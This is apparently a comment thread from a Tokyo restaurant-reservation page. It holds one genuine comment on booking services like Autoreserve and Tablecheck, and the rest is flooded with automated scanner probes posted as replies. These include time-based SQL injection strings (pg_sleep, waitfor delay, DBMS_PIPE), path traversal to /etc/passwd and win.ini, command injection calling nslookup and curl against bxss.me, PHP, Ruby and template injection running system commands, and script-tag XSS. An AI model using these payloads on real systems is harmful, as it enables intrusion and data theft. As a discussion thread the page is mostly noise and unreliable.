'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: thetokyogourmet
'||(select 1 from (select pg_sleep(15))x)||'
re: thetokyogourmet
''||(select 1 from (select pg_sleep(15))x)||''
re: thetokyogourmet
'"
re: thetokyogourmet
@@YM1ya
re: thetokyogourmet
(select 198766*667891)
re: thetokyogourmet
(select 198766*667891 from DUAL)
It just seems like services like Autoreserve, Percotter, etc. have an increasingly limited use case. In recent years, many new joints (frequently run by younger chefs) have started taking reservations online on Tablecheck, Toreta, or even just IG. So companies like Autoreserve aren't needed for those. At the high-end, many well-reviewed restaurants have either partnered with Omakase, Tableall, or require phone-camping at specific times to get seats, so again, a service that calls once every 40mins isn't useful there.
So what we're left with is the awkward middle-ground of restaurants that are under the radar, and run by old-school chefs who don't do online reservations. And only if you're staying at a hotel without a concierge (otherwise your concierge can easily book, since it's under the radar).
re: JJ
xnWJbLTX
re: JJ
1*
re: JJ
1*
re: JJ
1*
re: JJ
1*
re: JJ
-1 OR 2+868-868-1=0+0+0+1
re: JJ
-1 OR 3+868-868-1=0+0+0+1
re: JJ
if(now()=sysdate(),sleep(15),0)
re: JJ
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: JJ
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: JJ
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: JJ
-1; waitfor delay '0:0:15' --
re: JJ
-1); waitfor delay '0:0:15' --
re: JJ
1 waitfor delay '0:0:15' --
re: JJ
uDjhMGWB'; waitfor delay '0:0:15' --
re: JJ
-5 OR 859=(SELECT 859 FROM PG_SLEEP(15))--
re: JJ
bu4z3qok
re: JJ
1*
re: JJ
1*
re: JJ
1*
re: JJ
1*
re: JJ
-1 OR 2+877-877-1=0+0+0+1
re: JJ
-1 OR 3+877-877-1=0+0+0+1
re: JJ
-5) OR 143=(SELECT 143 FROM PG_SLEEP(15))--
re: JJ
if(now()=sysdate(),sleep(15),0)
re: JJ
-1)) OR 621=(SELECT 621 FROM PG_SLEEP(15))--
re: JJ
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: JJ
HijFZjsJ' OR 119=(SELECT 119 FROM PG_SLEEP(15))--
re: JJ
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: JJ
NHbOJtpx') OR 932=(SELECT 932 FROM PG_SLEEP(15))--
re: JJ
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: JJ
kvoGbcIn')) OR 954=(SELECT 954 FROM PG_SLEEP(15))--
re: JJ
-1; waitfor delay '0:0:15' --
re: JJ
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: JJ
-1); waitfor delay '0:0:15' --
re: JJ
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: JJ
1 waitfor delay '0:0:15' --
re: JJ
'||(select 1 from (select pg_sleep(15))x)||'
re: JJ
1GQCSHak'; waitfor delay '0:0:15' --
re: JJ
''||(select 1 from (select pg_sleep(15))x)||''
re: JJ
1'"
re: JJ
@@NfLxw
re: JJ
-5 OR 739=(SELECT 739 FROM PG_SLEEP(15))--
re: JJ
-5) OR 883=(SELECT 883 FROM PG_SLEEP(15))--
re: JJ
-1)) OR 760=(SELECT 760 FROM PG_SLEEP(15))--
re: JJ
Nca27hmV' OR 336=(SELECT 336 FROM PG_SLEEP(15))--
re: JJ
fwdA8O3U') OR 990=(SELECT 990 FROM PG_SLEEP(15))--
re: JJ
qKOtGXg7')) OR 648=(SELECT 648 FROM PG_SLEEP(15))--
re: JJ
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: JJ
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: JJ
'||(select 1 from (select pg_sleep(15))x)||'
re: JJ
''||(select 1 from (select pg_sleep(15))x)||''
re: JJ
1'"
re: JJ
@@CjL6j
re: JJ
1tLKQqKGO
re: JJ
%0abcc:074625.67-13751.67.24afe.19990.2@bxss.me
re: JJ
response.write(9510767*9054170)
re: JJ
to@example.com>%0d%0abcc:074625.67-13752.67.24afe.19990.2@bxss.me
re: JJ
'+response.write(9510767*9054170)+'
re: JJ
"+response.write(9510767*9054170)+"
re: JJ
<esi:include src="http://bxss.me/rpb.png"/>
re: JJ
../../../../../../../../../../../../../../etc/passwd
re: JJ
${9999878+9999998}
re: JJ
../../../../../../../../../../../../../../windows/win.ini
re: JJ
file:///etc/passwd
re: JJ
../../../../../../../../../../../../../../../proc/version
re: JJ
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: JJ
../../../../../../../../../../etc/passwd%00.jpg
re: JJ
'.gethostbyname(lc('hitoc'.'pfoagydpdd2d7.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(117).chr(65).chr(110).chr(89).'
re: JJ
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: JJ
)
re: JJ
".gethostbyname(lc("hiter"."aqqnwwyy4860d.bxss.me."))."A".chr(67).chr(hex("58")).chr(108).chr(70).chr(102).chr(65)."
re: JJ
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: JJ
!(()&&!|*|*|
re: JJ
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: JJ
^(#$!@#$)(()))******
re: JJ
/etc/passwd
re: JJ
echo ogintl$()\ wtoepq\nz^xyu||a #' &echo ogintl$()\ wtoepq\nz^xyu||a #|" &echo ogintl$()\ wtoepq\nz^xyu||a #
re: JJ
%2fetc%2fpasswd
re: JJ
&echo rhoucj$()\ hrzlpa\nz^xyu||a #' &echo rhoucj$()\ hrzlpa\nz^xyu||a #|" &echo rhoucj$()\ hrzlpa\nz^xyu||a #
re: JJ
/.././.././.././.././.././.././.././../etc/./passwd%00
re: JJ
|echo sjjuqt$()\ mnxeuz\nz^xyu||a #' |echo sjjuqt$()\ mnxeuz\nz^xyu||a #|" |echo sjjuqt$()\ mnxeuz\nz^xyu||a #
re: JJ
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: JJ
(nslookup hitizinnlrcrbd22ef.bxss.me||perl -e "gethostbyname('hitizinnlrcrbd22ef.bxss.me')")
re: JJ
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: JJ
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: JJ
HttP://bxss.me/t/xss.html?%00
re: JJ
$(nslookup hitdpwelsufuwf72a1.bxss.me||perl -e "gethostbyname('hitdpwelsufuwf72a1.bxss.me')")
re: JJ
"+"A".concat(70-3).concat(22*4).concat(122).concat(70).concat(102).concat(88)+(require"socket"
Socket.gethostbyname("hitmg"+"asithino5d6f5.bxss.me.")[3].to_s)+"
re: JJ
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: JJ
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: JJ
bxss.me/t/xss.html?%00
re: JJ
&nslookup hitppzhhgzshcdb408.bxss.me&'\"`0&nslookup hitppzhhgzshcdb408.bxss.me&`'
re: JJ
'+'A'.concat(70-3).concat(22*4).concat(118).concat(65).concat(122).concat(89)+(require'socket'
Socket.gethostbyname('hitmc'+'cuqcmskz5f4e9.bxss.me.')[3].to_s)+'
re: JJ
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: JJ
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: JJ
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: JJ
&(nslookup hitdnmuyuetjw9323b.bxss.me||perl -e "gethostbyname('hitdnmuyuetjw9323b.bxss.me')")&'\"`0&(nslookup hitdnmuyuetjw9323b.bxss.me||perl -e "gethostbyname('hitdnmuyuetjw9323b.bxss.me')")&`'
re: JJ
';print(md5(31337));$a='
re: JJ
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: JJ
Http://bxss.me/t/fit.txt
re: JJ
|(nslookup hitjiwpthmyed69410.bxss.me||perl -e "gethostbyname('hitjiwpthmyed69410.bxss.me')")
re: JJ
";print(md5(31337));$a="
re: JJ
file:///etc/passwd
re: JJ
'"
re: JJ
http://bxss.me/t/fit.txt%3F.jpg
re: JJ
`(nslookup hitojhbwibnleecd98.bxss.me||perl -e "gethostbyname('hitojhbwibnleecd98.bxss.me')")`
re: JJ
${@print(md5(31337))}
re: JJ
/\../\../\../\../\../\../\../etc/passwd
re: JJ
<!--
re: JJ
/etc/shells
re: JJ
;(nslookup hitxskbqnluxtbff6b.bxss.me||perl -e "gethostbyname('hitxskbqnluxtbff6b.bxss.me')")|(nslookup hitxskbqnluxtbff6b.bxss.me||perl -e "gethostbyname('hitxskbqnluxtbff6b.bxss.me')")&(nslookup hitxskbqnluxtbff6b.bxss.me||perl -e "gethostbyname('hitxskbqnluxtbff6b.bxss.me')")
re: JJ
${@print(md5(31337))}\
re: JJ
/WEB-INF/web.xml
re: JJ
c:/windows/win.ini
re: JJ
'.print(md5(31337)).'
re: JJ
C:\WINDOWS\system32\drivers\etc\hosts
re: JJ
bxss.me
re: JJ
../../../../../../../../../../windows/win.ini%00.jpg
re: JJ
/../../../../../../../../../../boot.ini
re: JJ
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: JJ
..\..\..\..\..\..\..\..\windows\win.ini
re: JJ
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: JJ
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: JJ
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: JJ
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: JJ
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: JJ
WEB-INF/web.xml
re: JJ
WEB-INF\web.xml
re: JJ
1
re: JJ
1
re: JJ
-1 OR 2+997-997-1=0+0+0+1 --
re: JJ
-1 OR 3+997-997-1=0+0+0+1 --
re: JJ
-1 OR 2+385-385-1=0+0+0+1
re: JJ
-1 OR 3+385-385-1=0+0+0+1
re: JJ
-1' OR 2+296-296-1=0+0+0+1 --
re: JJ
-1' OR 3+296-296-1=0+0+0+1 --
re: JJ
-1' OR 2+569-569-1=0+0+0+1 or 'IZ6AtQH6'='
re: JJ
-1' OR 3+569-569-1=0+0+0+1 or 'IZ6AtQH6'='
re: JJ
-1" OR 2+274-274-1=0+0+0+1 --
re: JJ
-1" OR 3+274-274-1=0+0+0+1 --
re: JJ
if(now()=sysdate(),sleep(15),0)
re: JJ
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: JJ
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: JJ
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: JJ
-1; waitfor delay '0:0:15' --
re: JJ
-1); waitfor delay '0:0:15' --
re: JJ
1 waitfor delay '0:0:15' --
re: JJ
BddABrpH'; waitfor delay '0:0:15' --
re: JJ
-5 OR 936=(SELECT 936 FROM PG_SLEEP(15))--
re: JJ
-5) OR 199=(SELECT 199 FROM PG_SLEEP(15))--
re: JJ
-1)) OR 211=(SELECT 211 FROM PG_SLEEP(15))--
re: JJ
PhOVAyvY' OR 775=(SELECT 775 FROM PG_SLEEP(15))--
re: JJ
UVRQFlcd') OR 215=(SELECT 215 FROM PG_SLEEP(15))--
re: JJ
MChBWX0o')) OR 818=(SELECT 818 FROM PG_SLEEP(15))--
re: JJ
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: JJ
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: JJ
'||(select 1 from (select pg_sleep(15))x)||'
re: JJ
''||(select 1 from (select pg_sleep(15))x)||''
re: JJ
1'"
re: JJ
@@nc0Zj
re: JJ
1
re: JJ
1
re: JJ
1
re: JJ
1
re: JJ
1
re: JJ
1
re: JJ
1QKKPI9V90
re: JJ
response.write(9414324*9935357)
re: JJ
'+response.write(9414324*9935357)+'
re: JJ
"+response.write(9414324*9935357)+"
re: JJ
<esi:include src="http://bxss.me/rpb.png"/>
re: JJ
../../../../../../../../../../../../../../etc/passwd
re: JJ
../../../../../../../../../../../../../../windows/win.ini
re: JJ
${9999497+9999293}
re: JJ
file:///etc/passwd
re: JJ
../
re: JJ
redirtest.acx
re: JJ
)
re: JJ
!(()&&!|*|*|
re: JJ
^(#$!@#$)(()))******
re: JJ
ctime
sleep
p0
(I30
tp1
Rp2
.
re: JJ
'.gethostbyname(lc('hitut'.'mqkqkbrf2c0b1.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(122).chr(67).chr(117).chr(66).'
re: JJ
".gethostbyname(lc("hitpd"."wqvbglqm04a44.bxss.me."))."A".chr(67).chr(hex("58")).chr(120).chr(76).chr(111).chr(88)."
re: JJ
gethostbyname(lc('hitxh'.'doiglpurf3c98.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(115).chr(72).chr(101).chr(88)
re: JJ
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
re: JJ
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs .jpg
re: JJ
HttP://bxss.me/t/xss.html?%00
re: JJ
/etc/shells
re: JJ
../../../../../../../../../../../../../../etc/shells
re: JJ
bxss.me/t/xss.html?%00
re: JJ
c:/windows/win.ini
re: JJ
echo palxei$()\ cggcyr\nz^xyu||a #' &echo palxei$()\ cggcyr\nz^xyu||a #|" &echo palxei$()\ cggcyr\nz^xyu||a #
re: JJ
bxss.me
re: JJ
&echo gmmqyk$()\ sjtsxm\nz^xyu||a #' &echo gmmqyk$()\ sjtsxm\nz^xyu||a #|" &echo gmmqyk$()\ sjtsxm\nz^xyu||a #
re: JJ
"+"A".concat(70-3).concat(22*4).concat(121).concat(89).concat(107).concat(79)+(require"socket"
Socket.gethostbyname("hithi"+"vkyuekjv8c641.bxss.me.")[3].to_s)+"
re: JJ
replies
re: JJ
Http://bxss.me/t/fit.txt
re: JJ
|echo tlvmqg$()\ qmytzy\nz^xyu||a #' |echo tlvmqg$()\ qmytzy\nz^xyu||a #|" |echo tlvmqg$()\ qmytzy\nz^xyu||a #
re: JJ
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: JJ
'+'A'.concat(70-3).concat(22*4).concat(98).concat(81).concat(109).concat(89)+(require'socket'
Socket.gethostbyname('hitvq'+'ptzalpnr2afd9.bxss.me.')[3].to_s)+'
re: JJ
replies
re: JJ
http://bxss.me/t/fit.txt?.jpg
re: JJ
expr 9000656551 - 964989
re: JJ
';print(md5(31337));$a='
re: JJ
'A'.concat(70-3).concat(22*4).concat(111).concat(80).concat(110).concat(81)+(require'socket'
Socket.gethostbyname('hitvx'+'fcamlqnme88b0.bxss.me.')[3].to_s)
re: JJ
replies/.
re: JJ
'"
re: JJ
(nslookup -q=cname hitsvznpqowruf1cb4.bxss.me||curl hitsvznpqowruf1cb4.bxss.me))
re: JJ
";print(md5(31337));$a="
re: JJ
$(nslookup -q=cname hitffvvzfqgru7de66.bxss.me||curl hitffvvzfqgru7de66.bxss.me)
re: JJ
<!--
re: JJ
${@print(md5(31337))}
re: JJ
'"()
re: JJ
&nslookup -q=cname hitccqvksethv32aae.bxss.me&'\"`0&nslookup -q=cname hitccqvksethv32aae.bxss.me&`'
re: JJ
${@print(md5(31337))}\
re: JJ
'&&sleep(27*1000)*bymsdm&&'
re: JJ
&(nslookup -q=cname hitbphnbhdggq4ad3d.bxss.me||curl hitbphnbhdggq4ad3d.bxss.me)&'\"`0&(nslookup -q=cname hitbphnbhdggq4ad3d.bxss.me||curl hitbphnbhdggq4ad3d.bxss.me)&`'
re: JJ
'.print(md5(31337)).'
re: JJ
"&&sleep(27*1000)*hahhus&&"
re: JJ
|(nslookup -q=cname hitndwssyuopg35eed.bxss.me||curl hitndwssyuopg35eed.bxss.me)
re: JJ
'||sleep(27*1000)*qyoyhb||'
re: JJ
`(nslookup -q=cname hitqzksrzowsq6a3ff.bxss.me||curl hitqzksrzowsq6a3ff.bxss.me)`
re: JJ
"||sleep(27*1000)*bhcjhe||"
re: JJ
;(nslookup -q=cname hitdievqzzhdye8388.bxss.me||curl hitdievqzzhdye8388.bxss.me)|(nslookup -q=cname hitdievqzzhdye8388.bxss.me||curl hitdievqzzhdye8388.bxss.me)&(nslookup -q=cname hitdievqzzhdye8388.bxss.me||curl hitdievqzzhdye8388.bxss.me)
re: JJ
|(nslookup${IFS}-q${IFS}cname${IFS}hitxnlmopruwy01988.bxss.me||curl${IFS}hitxnlmopruwy01988.bxss.me)
re: JJ
'"()&%<zzz><ScRiPt >Qa0T(9465)</ScRiPt>
re: JJ
&(nslookup${IFS}-q${IFS}cname${IFS}hitvubtspjlxzbc15d.bxss.me||curl${IFS}hitvubtspjlxzbc15d.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitvubtspjlxzbc15d.bxss.me||curl${IFS}hitvubtspjlxzbc15d.bxss.me)&`'
re: JJ
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitaasnlcckii0a436.bxss.me")}}
re: JJ
'"()&%<zzz><ScRiPt >Qa0T(9761)</ScRiPt>
re: JJ
9293842
re: JJ
OSpsBgsW
re: JJ
*1
re: JJ
*1
re: JJ
*1
re: JJ
*1
re: JJ
-1 OR 5*5=25 --
re: JJ
-1 OR 5*5=26 --
re: JJ
-1 OR 5*5=25
re: JJ
-1 OR 5*5=26
re: JJ
*if(now()=sysdate(),sleep(15),0)
re: JJ
0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z
re: JJ
0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z
re: JJ
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: JJ
-1; waitfor delay '0:0:15' --
re: JJ
-1); waitfor delay '0:0:15' --
re: JJ
-1 waitfor delay '0:0:15' --
re: JJ
lKmsLRir'; waitfor delay '0:0:15' --
re: JJ
-1 OR 175=(SELECT 175 FROM PG_SLEEP(15))--
re: JJ
-1) OR 905=(SELECT 905 FROM PG_SLEEP(15))--
re: JJ
-1)) OR 173=(SELECT 173 FROM PG_SLEEP(15))--
re: JJ
pADPWuyZ' OR 894=(SELECT 894 FROM PG_SLEEP(15))--
re: JJ
yVbTzvWv') OR 529=(SELECT 529 FROM PG_SLEEP(15))--
re: JJ
Yo2G8I9I')) OR 295=(SELECT 295 FROM PG_SLEEP(15))--
re: JJ
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: JJ
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: JJ
'||(select 1 from (select pg_sleep(15))x)||'
re: JJ
''||(select 1 from (select pg_sleep(15))x)||''
re: JJ
'"
re: JJ
@@iIVPE
re: JJ
